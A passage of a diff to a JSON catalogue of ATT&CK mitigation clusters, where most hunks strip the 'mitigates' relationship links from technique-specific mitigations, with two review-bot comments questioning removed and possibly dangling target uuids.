"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "25d5e1d8-c6fb-4735-bc57-115a21222f4b",
"value": "Application Window Discovery Mitigation - T1010"
},
@@ -2568,6 +1867,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d",
"tags": [
@@ -2631,6 +1937,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"tags": [
@@ -2771,6 +2084,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -2806,13 +2126,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
"tags": [
@@ -2842,15 +2155,7 @@
"https://attack.mitre.org/mitigations/T1004"
]
},
- "related": [
- {
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "313c8b20-4d49-40c1-9ac0-4c573aca28f3",
"value": "Winlogon Helper DLL Mitigation - T1004"
},
@@ -2867,15 +2172,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ae56a49d-5281-45c5-ab95-70a1439c338e",
"value": "Compile After Delivery Mitigation - T1500"
},
@@ -2923,13 +2220,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "233fe2c0-cb41-4765-b454-e0087597fbce",
"tags": [
@@ -3136,15 +2426,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d8787791-d22e-45bb-a9a8-251d8d0a1ff2",
"value": "System Service Discovery Mitigation - T1007"
},
@@ -3161,15 +2443,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f0a42cad-9b1f-44da-a672-718f18381018",
"value": "Taint Shared Content Mitigation - T1080"
},
@@ -3183,15 +2457,7 @@
"https://technet.microsoft.com/en-us/library/dn408187.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9e57c770-5a39-49a2-bb91-253ba629e3ac",
"value": "Security Support Provider Mitigation - T1101"
},
@@ -3208,15 +2474,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1881da33-fdf2-4eea-afd0-e04caf9c000f",
"value": "Peripheral Device Discovery Mitigation - T1120"
},
@@ -3229,15 +2487,7 @@
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements"
]
},
- "related": [
- {
- "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "49961e75-b493-423a-9ec7-ac2d6f55384a",
"value": "Password Policy Discovery Mitigation - T1201"
},
@@ -3251,15 +2501,7 @@
"https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
]
},
- "related": [
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "23061b40-a7b6-454f-8950-95d5ff80331c",
"value": "Install Root Certificate Mitigation - T1130"
},
@@ -3275,15 +2517,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "fe0aeb41-1a51-4152-8467-628256ea6adf",
"value": "Modify Existing Service Mitigation - T1031"
},
@@ -3296,15 +2530,7 @@
"https://attack.mitre.org/mitigations/T1105"
]
},
- "related": [
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cdecc44a-1dbf-4c1f-881c-f21e3f47272a",
"value": "Remote File Copy Mitigation - T1105"
},
@@ -3321,15 +2547,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "aaa92b37-f96c-4a0a-859c-b1cb6faeb13d",
"value": "Graphical User Interface Mitigation - T1061"
},
@@ -3341,15 +2559,7 @@
"https://attack.mitre.org/mitigations/T1017"
]
},
- "related": [
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c88151a5-fe3f-4773-8147-d801587065a4",
"value": "Application Deployment Software Mitigation - T1017"
},
@@ -3362,22 +2572,7 @@
"https://attack.mitre.org/mitigations/T1081"
]
},
- "related": [
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0472af99-f25c-4abe-9fce-010fa3450e72",
"value": "Credentials in Files Mitigation - T1081"
},
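Review bot: Credentials in Files Mitigation (T1081) loses two links at once (`837f9164-50af-4ac0-8219-379d8a74cefc` and `ba8e391f-14b5-496f-81f2-2d5ecd646c1c`), the first hunk in this patch where a mitigation mapped to more than one technique. If the intent is that technique-specific mitigation clusters no longer carry relationships at all, that should be stated once in the PR description; if only the targets went away upstream, a list of the retired target uuids would let reviewers check the two cases apart.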
@@ -3394,15 +2589,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9a902722-cecd-4fbe-a6c9-49333aa0f8c2",
"value": "Remote System Discovery Mitigation - T1018"
},
@@ -3420,15 +2607,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1e614ba5-2fc5-4464-b512-2ceafb14d76d",
"value": "Indirect Command Execution Mitigation - T1202"
},
@@ -3440,15 +2619,7 @@
"https://attack.mitre.org/mitigations/T1220"
]
},
- "related": [
- {
- "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7708ac15-4beb-4863-a1a5-da2d63fb8a3c",
"value": "XSL Script Processing Mitigation - T1220"
},
@@ -3461,15 +2632,7 @@
"https://attack.mitre.org/mitigations/T1032"
]
},
- "related": [
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a766ce73-5583-48f3-b7c0-0bb43c6ef8c7",
"value": "Standard Cryptographic Protocol Mitigation - T1032"
},
@@ -3482,15 +2645,7 @@
"https://attack.mitre.org/mitigations/T1024"
]
},
- "related": [
- {
- "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a569295c-a093-4db4-9fb4-7105edef85ad",
"value": "Custom Cryptographic Protocol Mitigation - T1024"
},
@@ -3507,15 +2662,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c620e3a1-fff5-424f-abea-d2b0f3616f67",
"value": "System Information Discovery Mitigation - T1082"
},
@@ -3528,15 +2675,7 @@
"https://attack.mitre.org/mitigations/T1028"
]
},
- "related": [
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3e9f8875-d2f7-4380-a578-84393bd3b025",
"value": "Windows Remote Management Mitigation - T1028"
},
@@ -3566,15 +2705,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bd2554b8-634f-4434-a986-9b49c29da2ae",
"value": "Security Software Discovery Mitigation - T1063"
},
@@ -3591,15 +2722,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d256cb63-b021-4b4a-bb6d-1b42eea179a3",
"value": "Network Service Scanning Mitigation - T1046"
},
@@ -3647,20 +2770,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
"tags": [
@@ -3703,13 +2812,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b",
"tags": [
@@ -3735,15 +2837,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bb25b897-bfc7-4128-839d-52e9764dbfa6",
"value": "Inhibit System Recovery Mitigation - T1490"
},
@@ -3756,15 +2850,7 @@
"https://attack.mitre.org/mitigations/T1065"
]
},
- "related": [
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a0d8db1d-a731-4428-8209-c07175f4b1fe",
"value": "Uncommonly Used Port Mitigation - T1065"
},
@@ -3777,15 +2863,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml"
]
},
- "related": [
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "bcee7b05-89a6-41a5-b7aa-fce4da7ede9e",
"value": "Pass the Hash Mitigation - T1075"
},
@@ -3799,15 +2877,7 @@
"https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx"
]
},
- "related": [
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "53b3b027-bed3-480c-9101-1247047d0fe6",
"value": "Remote Desktop Protocol Mitigation - T1076"
},
@@ -3827,15 +2897,7 @@
"https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore"
]
},
- "related": [
- {
- "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ac008435-af58-4f77-988a-c9b96c5920f5",
"value": "NTFS File Attributes Mitigation - T1096"
},
@@ -3852,15 +2914,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dd9a85ad-6a92-4986-a215-b01d0ce7b987",
"value": "Permission Groups Discovery Mitigation - T1069"
},
@@ -3877,15 +2931,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "308855d1-078b-47ad-8d2a-8f9b2713ffb5",
"value": "Windows Admin Shares Mitigation - T1077"
},
@@ -3904,15 +2950,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3a476d83-43eb-4fad-9b75-b1febd834e3d",
"value": "Pass the Ticket Mitigation - T1097"
},
@@ -3924,15 +2962,7 @@
"https://attack.mitre.org/mitigations/T1089"
]
},
- "related": [
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "388606d3-f38f-45bf-885d-a9dc9df3c8a8",
"value": "Disabling Security Tools Mitigation - T1089"
},
@@ -3944,15 +2974,7 @@
"https://attack.mitre.org/mitigations/T1151"
]
},
- "related": [
- {
- "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "02f0f92a-0a51-4c94-9bda-6437b9a93f22",
"value": "Space after Filename Mitigation - T1151"
},
@@ -3964,22 +2986,7 @@
"https://attack.mitre.org/mitigations/T1214"
]
},
- "related": [
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4490fee2-5c70-4db3-8db5-8d88767dbd55",
"value": "Credentials in Registry Mitigation - T1214"
},
@@ -3996,15 +3003,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82d8e990-c901-4aed-8596-cc002e7eb307",
"value": "System Time Discovery Mitigation - T1124"
},
@@ -4021,15 +3020,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c0b39f9-a0c5-42b2-abd8-dc8f1eb74e67",
"value": "Browser Bookmark Discovery Mitigation - T1217"
},
@@ -4044,15 +3035,7 @@
"https://attack.mitre.org/mitigations/T1128"
]
},
- "related": [
- {
- "dest-uuid": "bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "624d063d-cda8-4616-b4e4-54c04e427aec",
"value": "Netsh Helper DLL Mitigation - T1128"
},
@@ -4064,15 +3047,7 @@
"https://attack.mitre.org/mitigations/T1219"
]
},
- "related": [
- {
- "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "af093bc8-7b59-4e2a-9da8-8e839b4c50c6",
"value": "Remote Access Tools Mitigation - T1219"
},
@@ -4084,15 +3059,7 @@
"https://attack.mitre.org/mitigations/T1133"
]
},
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2",
"value": "External Remote Services Mitigation - T1133"
},
@@ -4106,15 +3073,7 @@
"https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token"
]
},
- "related": [
- {
- "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c61fee9f-16fb-4f8c-bbf0-869093fcd4a6",
"value": "Access Token Manipulation Mitigation - T1134"
},
@@ -4131,15 +3090,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1f34230d-b6ae-4dc7-8599-78c18820bd21",
"value": "Network Share Discovery Mitigation - T1135"
},
@@ -4158,15 +3109,7 @@
"https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/"
]
},
- "related": [
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "80c91478-ac87-434f-bee7-11f37aec4d74",
"value": "Dynamic Data Exchange Mitigation - T1173"
},
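Review bot: `edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0` is removed twice in this patch, here as the only link of the Dynamic Data Exchange Mitigation (T1173) and earlier from another cluster's list in the `@@ -3703,13 +2812,6 @@` hunk. Two removals of the same target point at the target cluster itself having gone from the source rather than at per-mitigation edits; a grep over the resulting file for that `dest-uuid` would confirm no remaining entry still references it, otherwise a dangling relationship is left behind.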
@@ -4179,22 +3122,7 @@
"https://attack.mitre.org/mitigations/T1146"
]
},
- "related": [
- {
- "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3e7018e9-7389-48e7-9208-0bdbcbba9483",
"value": "Clear Command History Mitigation - T1146"
},
@@ -4207,15 +3135,7 @@
"https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx"
]
},
- "related": [
- {
- "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "00d7d21b-69d6-4797-88a2-c86f3fc97651",
"value": "Password Filter DLL Mitigation - T1174"
},
@@ -4227,15 +3147,7 @@
"https://attack.mitre.org/mitigations/T1194"
]
},
- "related": [
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c861bcb1-946f-450d-ab75-d4e3c1103a56",
"value": "Spearphishing via Service Mitigation - T1194"
},
@@ -4250,15 +3162,7 @@
"https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf"
]
},
- "related": [
- {
- "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "97d8eadb-0459-4c1d-bf1a-e053bd75df61",
"value": "Supply Chain Compromise Mitigation - T1195"
},
@@ -4270,15 +3174,7 @@
"https://attack.mitre.org/mitigations/T1166"
]
},
- "related": [
- {
- "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "073cc04d-ac46-4f5a-85d7-83a91ecd6a19",
"value": "Setuid and Setgid Mitigation - T1166"
},
@@ -4290,15 +3186,7 @@
"https://attack.mitre.org/mitigations/T1168"
]
},
- "related": [
- {
- "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c47a9b55-8f61-4b82-b833-1db6242c754e",
"value": "Local Job Scheduling Mitigation - T1168"
},
@@ -4314,15 +3202,7 @@
"https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx"
]
},
- "related": [
- {
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef",
"value": "Control Panel Items Mitigation - T1196"
},
@@ -4335,15 +3215,7 @@
"https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913"
]
},
- "related": [
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "08e02f67-ea09-4f77-a70b-414963c29fc2",
"value": "Compiled HTML File Mitigation - T1223"
},
@@ -4356,15 +3228,7 @@
"https://attack.mitre.org/mitigations/T1482"
]
},
- "related": [
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "159b4ee4-8fa1-44a5-b095-2973f3c7e25e",
"value": "Domain Trust Discovery Mitigation - T1482"
},
@@ -4377,15 +3241,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e9362d25-4427-446b-99e8-b8f0c3b86615",
"value": "Stored Data Manipulation Mitigation - T1492"
},
@@ -4401,22 +3257,7 @@
"https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/"
]
},
- "related": [
- {
- "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "3bd2cf87-1ceb-4317-9aee-3e7dc713261b",
"value": "Domain Generation Algorithms Mitigation - T1483"
},
@@ -4428,15 +3269,7 @@
"https://attack.mitre.org/mitigations/T1493"
]
},
- "related": [
- {
- "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "245075bc-f992-4d89-af8c-834c53d403f4",
"value": "Transmitted Data Manipulation Mitigation - T1493"
},
@@ -4453,15 +3286,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "337172b1-b003-4034-8a3f-1d89a71da628",
"value": "Runtime Data Manipulation Mitigation - T1494"
},
@@ -4477,15 +3302,7 @@
"https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)"
]
},
- "related": [
- {
- "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "54246e2e-683f-4bf2-be4c-d7d5a60e7d22",
"value": "LLMNR/NBT-NS Poisoning Mitigation - T1171"
},
@@ -4512,20 +3329,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -4547,20 +3350,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "54456690-84de-4538-9101-643e26437e09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
